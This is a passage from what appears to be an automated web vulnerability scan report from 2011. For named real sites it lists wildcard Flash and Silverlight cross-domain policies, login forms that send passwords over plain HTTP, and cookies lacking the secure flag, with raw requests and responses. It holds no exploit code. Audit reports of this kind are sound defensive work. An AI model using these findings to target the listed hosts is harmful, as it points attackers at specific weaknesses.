<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.7. http://mtrcs.popcap.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtrcs.popcap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.8. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3b 6971
Set-Cookie: ts=1310503212; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:12 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.9. http://s.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 12 Jul 2011 20:47:00 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://stats.adobe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
xserver: www1
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://www.burstnet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Wed, 11 May 2011 13:13:45 GMT
ETag: "110080-66-4dca8b89"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.12. http://www.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:13 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://www7.lowes.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www7.lowes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www7.lowes.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 21:30:49 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "13dd40-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=972
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.14. http://blogs.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:18 GMT
Server: Apache
Last-Modified: Wed, 03 Feb 2010 03:49:59 GMT
ETag: "12c0a86-d8-47eaa1cc427c0"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.adobe.com" />

</cross
...[SNIP]...

4.15. http://bstats.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:10 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.16. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=494
Expires: Tue, 12 Jul 2011 18:07:19 GMT
Date: Tue, 12 Jul 2011 17:59:05 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.17. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 12 Jul 2011 20:46:29 GMT
Expires: Tue, 12 Jul 2011 20:46:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.18. http://stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 27 Apr 2011 19:01:50 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

5. Silverlight cross-domain policy
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.2. http://metrics.apple.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www179
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://mtrcs.popcap.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtrcs.popcap.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
xserver: www262
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://stats.adobe.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.adobe.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
xserver: www10
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Wed, 18 May 2011 03:55:47 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://apps.ccbill.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/developers/faq.php
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<!-- accounts box start -->
           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.2. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<!-- accounts box start -->
           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.3. http://apps.ccbill.com/p/developer.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /p/developer.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://apps.ccbill.com/login.php

The form contains the following password field: password

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:03:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<!-- accounts box start -->
           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.4. http://ucc.state.ri.us/loginsystem/login_form.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /loginsystem/login_form.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: CheckLogin.asp (relative to http://ucc.state.ri.us/loginsystem/)

The form contains the following password field: PIN

Request

GET /loginsystem/login_form.asp HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/loginsystem/login.asp?FilingMethod=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12492
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:06 GMT
Cache-control: no-cache


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations </title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospace;
   font-size: 8pt;
   color: G
...[SNIP]...
<br>
   <form name="Login_Form" method="post" action="CheckLogin.asp" OnSubmit="return InternetValidation(this)">
    <table border="0" cellpadding="4" cellspacing="0" width="100%">
...[SNIP]...
<td width="76%">
<input type="password" name="PIN" maxlength=4 size="30"
           onMouseOver="window.status='Please enter your PIN Number. If you have forgotten your PIN please contact us at corp_pin@sos.ri.gov.'; return true;"
           onMouseOut ="window.status=''; return true;">

        </td>
...[SNIP]...

7. SSL cookie without secure flag set
There are 115 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://www.chase.com/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: DCTMSESSION

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview
Content-Length: 200
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
